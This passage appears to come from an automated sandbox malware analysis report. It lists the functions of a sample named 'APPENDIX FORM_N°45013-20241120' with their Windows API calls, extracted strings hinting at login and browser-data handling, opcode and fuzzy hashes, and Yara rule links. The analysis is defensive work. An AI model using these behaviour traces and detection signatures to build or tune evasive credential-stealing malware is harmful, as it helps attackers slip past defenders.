                                                                                                              • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                              Function 00407E1E Relevance: 13.6, APIs: 9, Instructions: 115COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 00407E44
                                                                                                              • memset.MSVCRT ref: 00407E5B
                                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                              • wcscpy.MSVCRT ref: 00407F10
                                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 59245283-0
                                                                                                              • Opcode ID: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                                                              • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                                              • Opcode Fuzzy Hash: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                                                              • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                                              Function 0041851E Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                              • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                              • GetLastError.KERNEL32 ref: 0041855C
                                                                                                              • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                              • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                              • GetLastError.KERNEL32 ref: 0041858E
                                                                                                              • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                              • free.MSVCRT ref: 004185AC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                                              • String ID:
                                                                                                              • API String ID: 2802642348-0
                                                                                                              • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                              • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                              • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                              • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                              Function 00414E7F Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                                              • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                                              • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy
                                                                                                              • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                              • API String ID: 3510742995-3273207271
                                                                                                              • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                              • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                                              • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                              • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                                              Function 00413A3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004133E1,00000000,00000000), ref: 00413A7A
                                                                                                              • memset.MSVCRT ref: 00413ADC
                                                                                                              • memset.MSVCRT ref: 00413AEC
                                                                                                                • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                              • memset.MSVCRT ref: 00413BD7
                                                                                                              • wcscpy.MSVCRT ref: 00413BF8
                                                                                                              • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,00000000), ref: 00413C4E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                              • String ID: 3A
                                                                                                              • API String ID: 3300951397-293699754
                                                                                                              • Opcode ID: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                                                              • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                              • Opcode Fuzzy Hash: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                                                              • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                              Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                              • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                              • wcslen.MSVCRT ref: 0040D1D3
                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                              • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                              • memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                              • String ID: strings
                                                                                                              • API String ID: 3166385802-3030018805
                                                                                                              • Opcode ID: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                                                              • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                              • Opcode Fuzzy Hash: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                                                              • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                              Function 00411AC5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 00411AF6
                                                                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                              • wcsrchr.MSVCRT ref: 00411B14
                                                                                                              • wcscat.MSVCRT ref: 00411B2E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                              • String ID: AE$.cfg$General$EA
                                                                                                              • API String ID: 776488737-1622828088
                                                                                                              • Opcode ID: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                                                              • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                              • Opcode Fuzzy Hash: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                                                              • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                              Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0040D8BD
                                                                                                              • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                              • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                              • memset.MSVCRT ref: 0040D906
                                                                                                              • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                              • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                              • String ID: sysdatetimepick32
                                                                                                              • API String ID: 1028950076-4169760276
                                                                                                              • Opcode ID: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                                                              • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                              • Opcode Fuzzy Hash: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                                                              • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                              Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                              • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                              • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                              • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                              • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                              • memset.MSVCRT ref: 0041BA3D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy$memset
                                                                                                              • String ID: -journal$-wal
                                                                                                              • API String ID: 438689982-2894717839
                                                                                                              • Opcode ID: 441d401f2ecb898c8727535c1be97301f1c9a11951b4995e9674cbf0a45d1870
                                                                                                              • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                              • Opcode Fuzzy Hash: 441d401f2ecb898c8727535c1be97301f1c9a11951b4995e9674cbf0a45d1870
                                                                                                              • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                              Function 00405B83 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                              • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                              • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                                • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                                • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                              • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                              • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Item$Dialog$MessageSend
                                                                                                              • String ID:
                                                                                                              • API String ID: 3975816621-0
                                                                                                              • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                              • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                              • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                              • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                              Function 00444C89 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                              • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                              • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                              • String ID: .save$http://$https://$log profile$signIn
                                                                                                              • API String ID: 1214746602-2708368587
                                                                                                              • Opcode ID: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                                                              • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                              • Opcode Fuzzy Hash: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                                                              • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                              Function 00405DD1 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                                                                              • memset.MSVCRT ref: 00405E33
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                                                                              • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                                                                              • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                              • String ID:
                                                                                                              • API String ID: 2313361498-0
                                                                                                              • Opcode ID: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                                                              • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                              • Opcode Fuzzy Hash: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                                                              • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                              Function 00405F4E Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                              • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                              • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                                • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                              • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                              • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                              • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                              • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                              • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$ItemMessageRectSend$Client
                                                                                                              • String ID:
                                                                                                              • API String ID: 2047574939-0
                                                                                                              • Opcode ID: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                                              • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                              • Opcode Fuzzy Hash: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                                              • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                              Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                              • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                              • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                              • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                              • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                              • String ID:
                                                                                                              • API String ID: 4218492932-0
                                                                                                              • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                              • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                              • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                              • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                              Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                              • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                              • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                              • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                                • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                                • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                              • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
